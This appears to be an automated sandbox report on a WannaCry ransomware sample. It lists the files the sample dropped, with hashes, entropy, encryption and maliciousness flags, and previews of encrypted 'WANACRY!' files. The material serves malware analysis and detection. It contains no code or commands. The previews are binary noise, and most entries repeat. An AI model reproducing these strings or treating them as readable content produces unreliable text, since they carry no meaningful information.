                                                                                      SHA-512:16828D6C2F9205DB8CCE1827B6CE015BE465FD0074F64169D23914363890CDC869A0211F0722F57E07C025A09FD507F8E5FB1CC9C62EFAE77886BCAA8F98FAC6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....+m.....^?..s......0...Mr..C.... .9.==..{.&.v........G...#H>O...d...1..A..x:.....<..;\z.fl%?...rv6..5|~.......'..Q.6.\q........l....f.y...8!.y.i....%..?<.~.O......:Kwj...+m...<..._......"...3.-D/......8.].....?-.-R......&.8a..kRp.....4..s............C.[....@..]+;.|xS.iE...fr...1..8=."Uc..]U8..iA..fF..^r\..b.6...@~/.zte.....P.R...G....D...+..s...?.&..ShC.-.?|.p8.mD/D#..\@../..T$.)...[h.U...r$...Q.rp..._.....s....r.h.ke...!..Y.^Il..1`.{.=....B.;.(z_0F.#....<...H.=..z...c...cOq..A.`N,`..?+..t..-\..R.C..L$...".w~.Z^c'....f)..8.i.a .............I.....n3xDvbK..^>...L5E.{x{3k.+..Y..Bz.m3..'.3.7.i.@0.z........ ....Q.3..ewR..G..L..1.........X.I.B(..#..k.I-5...9.v..I.tb".m'...U}..K4r?..U.gl...<.......S.1a..D...7.....s.......U..C.j9I....^U.....}.].+{...$.m~j5..;OCJ.#|FP............P+J(Z.-.[A......8y..L...uz.ph."B...@.S.kn"...-.;Td....ar.@-d..mQJ.a....A..vU.M.*...}.G$-#.......]..3.N...3h...w6.t*....3.2....'>..d.\UI..|.T}$[
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048
                                                                                      Entropy (8bit):7.795680363930602
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5TYUw2nfioauGwWZVi9SFyv+f16sAvLgII1x9h3UNnwbf:bk5ThnHaDZVicF9f16s/jzWof
                                                                                      MD5:EA2B16DBE285997846F3EE6830A4F456
                                                                                      SHA1:A732A4603A47E4F6BA66C91D138FC65BC5917893
                                                                                      SHA-256:07DD673E7CB92E1D04B8E5DD0D436F1E02C26B132762D42D1D700D98F198CB30
                                                                                      SHA-512:16828D6C2F9205DB8CCE1827B6CE015BE465FD0074F64169D23914363890CDC869A0211F0722F57E07C025A09FD507F8E5FB1CC9C62EFAE77886BCAA8F98FAC6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....+m.....^?..s......0...Mr..C.... .9.==..{.&.v........G...#H>O...d...1..A..x:.....<..;\z.fl%?...rv6..5|~.......'..Q.6.\q........l....f.y...8!.y.i....%..?<.~.O......:Kwj...+m...<..._......"...3.-D/......8.].....?-.-R......&.8a..kRp.....4..s............C.[....@..]+;.|xS.iE...fr...1..8=."Uc..]U8..iA..fF..^r\..b.6...@~/.zte.....P.R...G....D...+..s...?.&..ShC.-.?|.p8.mD/D#..\@../..T$.)...[h.U...r$...Q.rp..._.....s....r.h.ke...!..Y.^Il..1`.{.=....B.;.(z_0F.#....<...H.=..z...c...cOq..A.`N,`..?+..t..-\..R.C..L$...".w~.Z^c'....f)..8.i.a .............I.....n3xDvbK..^>...L5E.{x{3k.+..Y..Bz.m3..'.3.7.i.@0.z........ ....Q.3..ewR..G..L..1.........X.I.B(..#..k.I-5...9.v..I.tb".m'...U}..K4r?..U.gl...<.......S.1a..D...7.....s.......U..C.j9I....^U.....}.].+{...$.m~j5..;OCJ.#|FP............P+J(Z.-.[A......8y..L...uz.ph."B...@.S.kn"...-.;Td....ar.@-d..mQJ.a....A..vU.M.*...}.G$-#.......]..3.N...3h...w6.t*....3.2....'>..d.\UI..|.T}$[
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.992965962870028
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:f/sw/Q3JNFWhcMfMvjz/GjACHm86deO5GWS:35Q3J3WhXUvvGjASGMj
                                                                                      MD5:9B3F2BEB01BCD3FF8EAFF8D680FAD1EA
                                                                                      SHA1:942A11BBC870E00F7571817E277092A2C48529BE
                                                                                      SHA-256:7E0BE9B3915A26B0DD54D99DD387FA44297715012115531B2C9A3765F3B86A34
                                                                                      SHA-512:B8D563F5A8989C91F8694A045EB0DF0403D08524C4B279B902216DB34F2F062B115FE96E5CEA9358D9E1802A1B417B5854D25768444C6B9067AD2C01D4CFACC9
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....Ck...G.}N?.y.(u.7...N.ZB^...."......E...Lc.+X."<....^...9...bK...|E+=.`<......q......^.P.P.b.....a..\..f.....7ru.'3j.....p..5.t.....<6k..!.B.l..@c......N.o....`..Y...!p.|X...=.ve...j.U.`b.?h...#iR.x.....e.}M uk.........A.m..\.o.o...LI.,.(s...Q......`.......F.\9g6....Z.r.u...Y...b..1|8.+.Dk.B....$.WO.+.....,:....2l.uB.<..].....b...)%...8~h....*..!T@....... ,........T.......0o.f.z..i.v.'Q.BsI2..g...p...X.zB.>.%.Q.;7t9.....}..go...z...#I... dl.5X.\..&.(DQL.0...#=.S_P.!.^..)..<\.A0QG!.N.=g..7..T...[....Z..y|...w..%..F+2.bi[.o..\.vW.,..n..`^..z.+....{Qm.T.k.......%(..h;..)%.b.<-.sQ"kMg..T.n4.....ns\.A.Q.9!:.OUq.i..:V..C{I..B.D&h6.^...-lKC.;|....e'..,k.p>cqg..G..PDD.7.........s.8....H..x...p.`.a..b.."..)..@r..oC..$.......9.-......j..!......'9..v/.Y{......a...MD..F].....@.>.....Q.v.X....!I...l.AM.+.^%E..."2....;.0.;....A.Gd...pe...M.:...OT!4_9.J.I.,v._.C-........&.._T ...F<..Z=@^,....z..>...R.. qT.3~...MC...V^..%O....x!....*g^/..J
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.992965962870028
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:f/sw/Q3JNFWhcMfMvjz/GjACHm86deO5GWS:35Q3J3WhXUvvGjASGMj
                                                                                      MD5:9B3F2BEB01BCD3FF8EAFF8D680FAD1EA
                                                                                      SHA1:942A11BBC870E00F7571817E277092A2C48529BE
                                                                                      SHA-256:7E0BE9B3915A26B0DD54D99DD387FA44297715012115531B2C9A3765F3B86A34
                                                                                      SHA-512:B8D563F5A8989C91F8694A045EB0DF0403D08524C4B279B902216DB34F2F062B115FE96E5CEA9358D9E1802A1B417B5854D25768444C6B9067AD2C01D4CFACC9
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....Ck...G.}N?.y.(u.7...N.ZB^...."......E...Lc.+X."<....^...9...bK...|E+=.`<......q......^.P.P.b.....a..\..f.....7ru.'3j.....p..5.t.....<6k..!.B.l..@c......N.o....`..Y...!p.|X...=.ve...j.U.`b.?h...#iR.x.....e.}M uk.........A.m..\.o.o...LI.,.(s...Q......`.......F.\9g6....Z.r.u...Y...b..1|8.+.Dk.B....$.WO.+.....,:....2l.uB.<..].....b...)%...8~h....*..!T@....... ,........T.......0o.f.z..i.v.'Q.BsI2..g...p...X.zB.>.%.Q.;7t9.....}..go...z...#I... dl.5X.\..&.(DQL.0...#=.S_P.!.^..)..<\.A0QG!.N.=g..7..T...[....Z..y|...w..%..F+2.bi[.o..\.vW.,..n..`^..z.+....{Qm.T.k.......%(..h;..)%.b.<-.sQ"kMg..T.n4.....ns\.A.Q.9!:.OUq.i..:V..C{I..B.D&h6.^...-lKC.;|....e'..,k.p>cqg..G..PDD.7.........s.8....H..x...p.`.a..b.."..)..@r..oC..$.......9.-......j..!......'9..v/.Y{......a...MD..F].....@.>.....Q.v.X....!I...l.AM.+.^%E..."2....;.0.;....A.Gd...pe...M.:...OT!4_9.J.I.,v._.C-........&.._T ...F<..Z=@^,....z..>...R.. qT.3~...MC...V^..%O....x!....*g^/..J
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.993074182229095
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:KqX4T913WSN1o3Pr58iA/RY8sR0F+FwWn9nErdQlMWJ15k0yQ4:KrxZtN1ol7ssGF4jnndfhh4
                                                                                      MD5:C647CD2DA2779935253207F731BD257A
                                                                                      SHA1:A89D65645386FA34BBB0F71FBD5F7D2984A9A861
                                                                                      SHA-256:8D0D3A9607CC1D65189671E0CC766DFB8D637C363E64C95FBB5B901283D875CB
                                                                                      SHA-512:0BF98D6CF17DF2986E570B3FA5126EA98AB297EE72474498CE1F3F8AE3F6618BBE5CC8393825538244402E1F9C593BAE79CFB9AC9CB50FBD41CC4F660736BA6A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....{.....QK.<L.d.....?..2..lWel.j...U....t.&.......#8747..r..i..&h#.7...@Mp.`.....fja..*.]+(..K$}...hH-%..=.odf.3.>...7]..J..K...P.......G.A.W......=...4S.@.`O..x.j...Z....ss.8.H.#.;....'.|1l.'.Q.&.3..L/.f....#...-|.....f.#..d../0.......k..O.A.....`.......sV......B....9*....<.w|`...S.zm...'...I~.z.6.l.`......O.p.X9...^X. ..P.gia.C....G...eU..P.N...(n.9...4..TD<.^...p.}ZB..~kX.y...5"Q..X.....s..%...[.h(qg..J~nh....{c-{]b..g7-.y.~.L.Y?...w....x.G/A..9w....f.</,%^,.he}.p.._.g..V..uL....o.w...WA...I@.p .=.Ko&#......"..<..wL.yzj. U..|...!.~.....`..Pyf..#....7.XfW...D.N.m..f...[>...R...KY...O.....Po..g{Q.'..g.qK.]...".h.]..j.........;.......bO.0d.q.vH..aK.J..$.S.m.O.h...0e.ug.'......j.......C.."....2Q.C6.T8.7..K.)..8u... .....)...-#p.A.......7.?....p.........Tc3tX..w[....]0.rh....V5;.z..1A....wD(.j....r>...b.%.d..}..'...x...2.u...[7.m.......~.B.......&f.1~..Z].5..6.I.....y.o+l.u......\./......Y........|.t....J....Df`.v...g.Gw
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.993074182229095
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:KqX4T913WSN1o3Pr58iA/RY8sR0F+FwWn9nErdQlMWJ15k0yQ4:KrxZtN1ol7ssGF4jnndfhh4
                                                                                      MD5:C647CD2DA2779935253207F731BD257A
                                                                                      SHA1:A89D65645386FA34BBB0F71FBD5F7D2984A9A861
                                                                                      SHA-256:8D0D3A9607CC1D65189671E0CC766DFB8D637C363E64C95FBB5B901283D875CB
                                                                                      SHA-512:0BF98D6CF17DF2986E570B3FA5126EA98AB297EE72474498CE1F3F8AE3F6618BBE5CC8393825538244402E1F9C593BAE79CFB9AC9CB50FBD41CC4F660736BA6A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....{.....QK.<L.d.....?..2..lWel.j...U....t.&.......#8747..r..i..&h#.7...@Mp.`.....fja..*.]+(..K$}...hH-%..=.odf.3.>...7]..J..K...P.......G.A.W......=...4S.@.`O..x.j...Z....ss.8.H.#.;....'.|1l.'.Q.&.3..L/.f....#...-|.....f.#..d../0.......k..O.A.....`.......sV......B....9*....<.w|`...S.zm...'...I~.z.6.l.`......O.p.X9...^X. ..P.gia.C....G...eU..P.N...(n.9...4..TD<.^...p.}ZB..~kX.y...5"Q..X.....s..%...[.h(qg..J~nh....{c-{]b..g7-.y.~.L.Y?...w....x.G/A..9w....f.</,%^,.he}.p.._.g..V..uL....o.w...WA...I@.p .=.Ko&#......"..<..wL.yzj. U..|...!.~.....`..Pyf..#....7.XfW...D.N.m..f...[>...R...KY...O.....Po..g{Q.'..g.qK.]...".h.]..j.........;.......bO.0d.q.vH..aK.J..$.S.m.O.h...0e.ug.'......j.......C.."....2Q.C6.T8.7..K.)..8u... .....)...-#p.A.......7.?....p.........Tc3tX..w[....]0.rh....V5;.z..1A....wD(.j....r>...b.%.d..}..'...x...2.u...[7.m.......~.B.......&f.1~..Z].5..6.I.....y.o+l.u......\./......Y........|.t....J....Df`.v...g.Gw
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.992305014598493
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:HQhj/G3+ftj96dyf2elKNJoE3iDpclYO6U:HG/N7Cyf2eiSE3PYO6U
                                                                                      MD5:950313120DAB50F001A5E44004EDF6DA
                                                                                      SHA1:F1BF1FE73922CE30C3A8191E85C894C02C05355E
                                                                                      SHA-256:87F977B907E5F8F4E1CF26752902E94D35430066EA111E5D44484B112FE7615C
                                                                                      SHA-512:A77177DDB0277CC73F4F73CC2EBA62072299A73E3C91FCFCECA67B2A2FCCBA0B1AFE09E19EFA7EF34C9C61C25B0CE4271A4EFFAA8D03590162AE85B1DF46FBD8
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..../.....].......C=aI...:....G+>...vj;I0[.5.Mw..%....y3Y......7...q.wq.?G+CT(]...2d..y8..J.y.R/...rI.?aRN-art.Bk.8...~..gY.G..v.Vmr~@..F.....>Sf........?.^H.{..+.J.S.....H.f...L..........p.8.J9..a..e.(kH.R...@.....<..)........K....,:.... ..t"c..........`.......-"<.'...m.....K....,..C.u..*5.......z..... :r...1..].S..z.\#u..z.......s.?...Is..3.M\..b\.X.%e..^.<....h.....w.`Me.../ N..W.~q.`.P.[.W....N.s....=.]...r...Q..=J.#.;....S.L[dc...Tx[..%.$`..0"..;.....,5..hmou.sS"8..D...t8.6..!@f....8.<......!..4kq..p.E-Z...!.i.L.w/.I.I.-Ao.@2.vS,.....C...v.!...[.`.>..&..(.k.F....S.....).|u#IU...a..+...%..fe.7U.Y.+..O.....|z.:.v...!..P|.q...O..l..q,..........4/.B..}.5+........P."...Y..A..}..}Z2.......<`.....Yy.....SJ.^_...e.B`ai^.[F.SC.3./....m. C..,). "..t.2.zo.)9...v.-...'..i.`..f......;.'.....J..0G.....*..:..".(v.>..fZ.Z;.G.\".5..`...d..........].D...vOH.=.j.8:.z{...v/.VR...~].E.@6...f...L.ef..9Z+.f.z)..b.B1.....9U%T..u.}.^A.E.8.i....O..\.m.@Lc....u
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.992305014598493
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:HQhj/G3+ftj96dyf2elKNJoE3iDpclYO6U:HG/N7Cyf2eiSE3PYO6U
                                                                                      MD5:950313120DAB50F001A5E44004EDF6DA
                                                                                      SHA1:F1BF1FE73922CE30C3A8191E85C894C02C05355E
                                                                                      SHA-256:87F977B907E5F8F4E1CF26752902E94D35430066EA111E5D44484B112FE7615C
                                                                                      SHA-512:A77177DDB0277CC73F4F73CC2EBA62072299A73E3C91FCFCECA67B2A2FCCBA0B1AFE09E19EFA7EF34C9C61C25B0CE4271A4EFFAA8D03590162AE85B1DF46FBD8
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..../.....].......C=aI...:....G+>...vj;I0[.5.Mw..%....y3Y......7...q.wq.?G+CT(]...2d..y8..J.y.R/...rI.?aRN-art.Bk.8...~..gY.G..v.Vmr~@..F.....>Sf........?.^H.{..+.J.S.....H.f...L..........p.8.J9..a..e.(kH.R...@.....<..)........K....,:.... ..t"c..........`.......-"<.'...m.....K....,..C.u..*5.......z..... :r...1..].S..z.\#u..z.......s.?...Is..3.M\..b\.X.%e..^.<....h.....w.`Me.../ N..W.~q.`.P.[.W....N.s....=.]...r...Q..=J.#.;....S.L[dc...Tx[..%.$`..0"..;.....,5..hmou.sS"8..D...t8.6..!@f....8.<......!..4kq..p.E-Z...!.i.L.w/.I.I.-Ao.@2.vS,.....C...v.!...[.`.>..&..(.k.F....S.....).|u#IU...a..+...%..fe.7U.Y.+..O.....|z.:.v...!..P|.q...O..l..q,..........4/.B..}.5+........P."...Y..A..}..}Z2.......<`.....Yy.....SJ.^_...e.B`ai^.[F.SC.3./....m. C..,). "..t.2.zo.)9...v.-...'..i.`..f......;.'.....J..0G.....*..:..".(v.>..fZ.Z;.G.\".5..`...d..........].D...vOH.=.j.8:.z{...v/.VR...~].E.@6...f...L.ef..9Z+.f.z)..b.B1.....9U%T..u.}.^A.E.8.i....O..\.m.@Lc....u
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.992740761834146
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:o0kLzqpFMEw5I/ITu4A7wcsXMbA4mOY+ZQRbGmmo9hD+Mz+On08/Zx7bTaqS9iGF:ojkFQW7dsLRNHhD+MzLtx7bTo8GF
                                                                                      MD5:6425A5FB8A247BE50EB75ABEB151746A
                                                                                      SHA1:531BED84F619918DE866617C3BE4FD35688C1062
                                                                                      SHA-256:60AC105DD3FE6505277E0C96DC1F448C3DFFFCB5BA2E020113F96C643B5C654A
                                                                                      SHA-512:74A4DD6593ED764924C140EF9B6369527D83D2E1758ED3B664A74F0E070C8C4463BB7ECB1757FD2F49E9AD7DFB6B007F5973A5B791E8CCD22B74EB28C66524D6
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......{..kb....&..r..Su+x...I.s.E6..\M..xB.=HP.)|3G7.5.........o,..w.y..<.nT....7HA)....+r.EK@....}....2.#3}.=M.7.....`5..{...#I..mt1..d.'g..._^..6.....=.b.......n,......F)......Y..S.k.....s.Gx!L.?...V.a..W....M.P..M.....).e..Ww.sx...LG.c.F..|;!.[v#......`.........E..I..{....M...d..........zDu...._............mI.....W.".......M..u.....V..l..Ka..BO#.w.{.4R...r.p....}".I.N..@.)f...J.}~.-..H{..v.s.v..l...$....JSMbl.,.c..f[...6..C.$.....l.sWd...{......!>..E0N..I..f_".......6t...o..<41...)..<A.bb..~B..3.].;....._.V.F...5f.=...4....0...=...)d}...<b.#.!DGl.!....b.5....&.h.G.$...-W./]I..L..O....`4.......c.8V....P*..Uo.r3g....G.p...dB...)R`Pw....P..\.....gm...@).R8E.k.B....=..50}.....F..1.P..h..j.l.D....U:.9.$Lk.kN&H/#..ljo~!.;..Q.JPD..a/.h.L4#.5..Qj..V.v.n.'....2.....'.B)9.P..LZ....T.}.d.[.$...b{.L.P...<.&....M....1..>.....P...,7...y....Y...z.L<............^..Z)....==X.4.M.&. .............~.%,x\p.?t.Q....y.y.s.+..f.e;..^...A.k._..n..7..1.....@..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24856
                                                                                      Entropy (8bit):7.992740761834146
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:o0kLzqpFMEw5I/ITu4A7wcsXMbA4mOY+ZQRbGmmo9hD+Mz+On08/Zx7bTaqS9iGF:ojkFQW7dsLRNHhD+MzLtx7bTo8GF
                                                                                      MD5:6425A5FB8A247BE50EB75ABEB151746A
                                                                                      SHA1:531BED84F619918DE866617C3BE4FD35688C1062
                                                                                      SHA-256:60AC105DD3FE6505277E0C96DC1F448C3DFFFCB5BA2E020113F96C643B5C654A
                                                                                      SHA-512:74A4DD6593ED764924C140EF9B6369527D83D2E1758ED3B664A74F0E070C8C4463BB7ECB1757FD2F49E9AD7DFB6B007F5973A5B791E8CCD22B74EB28C66524D6
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......{..kb....&..r..Su+x...I.s.E6..\M..xB.=HP.)|3G7.5.........o,..w.y..<.nT....7HA)....+r.EK@....}....2.#3}.=M.7.....`5..{...#I..mt1..d.'g..._^..6.....=.b.......n,......F)......Y..S.k.....s.Gx!L.?...V.a..W....M.P..M.....).e..Ww.sx...LG.c.F..|;!.[v#......`.........E..I..{....M...d..........zDu...._............mI.....W.".......M..u.....V..l..Ka..BO#.w.{.4R...r.p....}".I.N..@.)f...J.}~.-..H{..v.s.v..l...$....JSMbl.,.c..f[...6..C.$.....l.sWd...{......!>..E0N..I..f_".......6t...o..<41...)..<A.bb..~B..3.].;....._.V.F...5f.=...4....0...=...)d}...<b.#.!DGl.!....b.5....&.h.G.$...-W./]I..L..O....`4.......c.8V....P*..Uo.r3g....G.p...dB...)R`Pw....P..\.....gm...@).R8E.k.B....=..50}.....F..1.P..h..j.l.D....U:.9.$Lk.kN&H/#..ljo~!.;..Q.JPD..a/.h.L4#.5..Qj..V.v.n.'....2.....'.B)9.P..LZ....T.}.d.[.$...b{.L.P...<.&....M....1..>.....P...,7...y....Y...z.L<............^..Z)....==X.4.M.&. .............~.%,x\p.?t.Q....y.y.s.+..f.e;..^...A.k._..n..7..1.....@..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4376
                                                                                      Entropy (8bit):7.95745702625359
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJ9tar47jyu4y2sDquMZo0rFT/oPb1I2d2WUb4ubzHT9/pPn:qfe47Wu/fdM2lK2NzIX9/pPn
                                                                                      MD5:D577C00EE93040E6910BF15EA126A391
                                                                                      SHA1:51EE84C539C3C6A168901EB977B0DE121E4E2ABB
                                                                                      SHA-256:EA4312AFD38EF3075AD2044555E491CFFD51B01730CE6B1BE52670D3BBC4B40F
                                                                                      SHA-512:BBC5BCCA7B272EF1FD3721E94A00FAD39FB2E16B81BB0A8E03EF1EB844446B66FEC26D169BBA84DA741AA28819EAC4E10F1A63A78A411169F6E3A24F03C7CE78
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......+..U!.V.;CQxN.U..;...Q.. <.[.l.~......j_..UaIe..qv...w...(..n@.Y./.gou6...@......d.M!7.U...K~.5.$..V..I....YGw....4_<...."...x.ri..@..Lh..0{..~.<(..e.......*.kQ.$..U.A.g!..ad.5)2.x2`L.5.>5...u.~n.`..:.}-u~DE.?..y.....K.=!Q...,..+..+4..z._..Q. k.mk...............5.t......8..x....k./......L{B...6b....hA..t?......P./}...I..*Z.A..l..7.#.JV.!..)...p..7.G..o..Q*....(QR)....C...G(...<........D...c.!.:....:6....4...8'0...RV9.H..........6...LQ.E..].o.I*%.......@.;.uB......C...B7[W.G.%7../........\I..8.fj|...q..f....4v@euQU...G_..'.].....T.'R..2.u.HV+A....^..t.....>Y..c.Z...`..@p......=k#.uI_..]....m..<*.GGYS.M.b....y..h0Y.LD..M......*....._.G~.y...O4.tI9e...y6.....45B/3%....Eg..........8.....<1R...k..A.)..L..#.'Lf.`.V.(...W!.^s.Qip. ..^...*.[.....?........l......<U.Xu..Kx.=0Y`f...c.w.."o....i.vX.s..kt}.>..k......`...z.#.3...(9...~.."..g..V..].*#.zv........._..^.....Fq.aZ.Ph.G..|.,.C.k.1..l..0....K.F...R.[..1...I=...3.T6...ME..._.9l?...O
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4376
                                                                                      Entropy (8bit):7.95745702625359
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJ9tar47jyu4y2sDquMZo0rFT/oPb1I2d2WUb4ubzHT9/pPn:qfe47Wu/fdM2lK2NzIX9/pPn
                                                                                      MD5:D577C00EE93040E6910BF15EA126A391
                                                                                      SHA1:51EE84C539C3C6A168901EB977B0DE121E4E2ABB
                                                                                      SHA-256:EA4312AFD38EF3075AD2044555E491CFFD51B01730CE6B1BE52670D3BBC4B40F
                                                                                      SHA-512:BBC5BCCA7B272EF1FD3721E94A00FAD39FB2E16B81BB0A8E03EF1EB844446B66FEC26D169BBA84DA741AA28819EAC4E10F1A63A78A411169F6E3A24F03C7CE78
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......+..U!.V.;CQxN.U..;...Q.. <.[.l.~......j_..UaIe..qv...w...(..n@.Y./.gou6...@......d.M!7.U...K~.5.$..V..I....YGw....4_<...."...x.ri..@..Lh..0{..~.<(..e.......*.kQ.$..U.A.g!..ad.5)2.x2`L.5.>5...u.~n.`..:.}-u~DE.?..y.....K.=!Q...,..+..+4..z._..Q. k.mk...............5.t......8..x....k./......L{B...6b....hA..t?......P./}...I..*Z.A..l..7.#.JV.!..)...p..7.G..o..Q*....(QR)....C...G(...<........D...c.!.:....:6....4...8'0...RV9.H..........6...LQ.E..].o.I*%.......@.;.uB......C...B7[W.G.%7../........\I..8.fj|...q..f....4v@euQU...G_..'.].....T.'R..2.u.HV+A....^..t.....>Y..c.Z...`..@p......=k#.uI_..]....m..<*.GGYS.M.b....y..h0Y.LD..M......*....._.G~.y...O4.tI9e...y6.....45B/3%....Eg..........8.....<1R...k..A.)..L..#.'Lf.`.V.(...W!.^s.Qip. ..^...*.[.....?........l......<U.Xu..Kx.=0Y`f...c.w.."o....i.vX.s..kt}.>..k......`...z.#.3...(9...~.."..g..V..].*#.zv........._..^.....Fq.aZ.Ph.G..|.,.C.k.1..l..0....K.F...R.[..1...I=...3.T6...ME..._.9l?...O
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.990422537991874
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:xKgatdNhek7oxI92oZDxeHXoNlZsnAqlnzSnEdPVq:jEhpoS99ZleEZuhzyIPVq
                                                                                      MD5:51BC3C34F111A41A23F89F1D9F2F1B93
                                                                                      SHA1:463794AC316493C2008D24D0F249087F2675FA74
                                                                                      SHA-256:AD0EB72C61AAD618AA897895A2C98BB2B4BEC2CEC2194C06BC57639C6EB669D3
                                                                                      SHA-512:62BE0CEBDC825E4EE18D58B129112BA664C933C81410D8CF6DCB6BCD610E4ADF5A7C9D1071D03C3D097B29C354134947E4A62ECC1FABB8EE2B233480C561230A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........<7w..Y.H{cb..^ ...5.'.p.......h......Y4. ..+J.."..T...+.@>.3.....AK...#..7...6.P.J.......*...9. .O..p....Q.~...f.h....k~V/..h.F|u....L.....0{..p%.,.\AfO.Rx7s*..|..^..}...<.-..=..WUXI.S..C.&...h..&-....#..oC.,.Md.......J%..i%+.q-.Bx.p.../.....@.........-.m.....3x......j25r0p..`....<Z.j.%....p_....1.Y.m......&.8...v....U2h>2....i.}].....Xb...K...!..M..k...a.f."Ja..4|.'.g....-tB.U.).......R2.].......S....VR(..c.728O.....w.d,.}.5m.dT..|...W..W}$..m.m.....=.x.(.D...=..(.=....;<.;.+.J..q._...Fo......e...l.VM.m..Q.~...'......8....`...QU.|\i_..v.....4.b..}...m.;....XLQ#.&|.{.x.$..MB...."..B./.&9o...Z.1R,.I.r... 3..u....}.......Y....!..].....f,.c.Y.0.q.4...S...E'p.... ....lX&..o.Y.._w[KD..W#...LV..1...gbFv.s.6...Wf....p..]...-.t..a1..-.W.e])....,.I...s1.j..+B.q..a..=.b\.'a#..1...7,.....+... ....E..d.9.3QH....!.[8::...h$.n.J..2-..S.=6..7....N..g..~.T..'..4.@N.....C...0.8.q.R..Jr.:.:..~.P...r..:..Z.}...9..|.zS....;yT....y......a,.Igw
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.990422537991874
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:xKgatdNhek7oxI92oZDxeHXoNlZsnAqlnzSnEdPVq:jEhpoS99ZleEZuhzyIPVq
                                                                                      MD5:51BC3C34F111A41A23F89F1D9F2F1B93
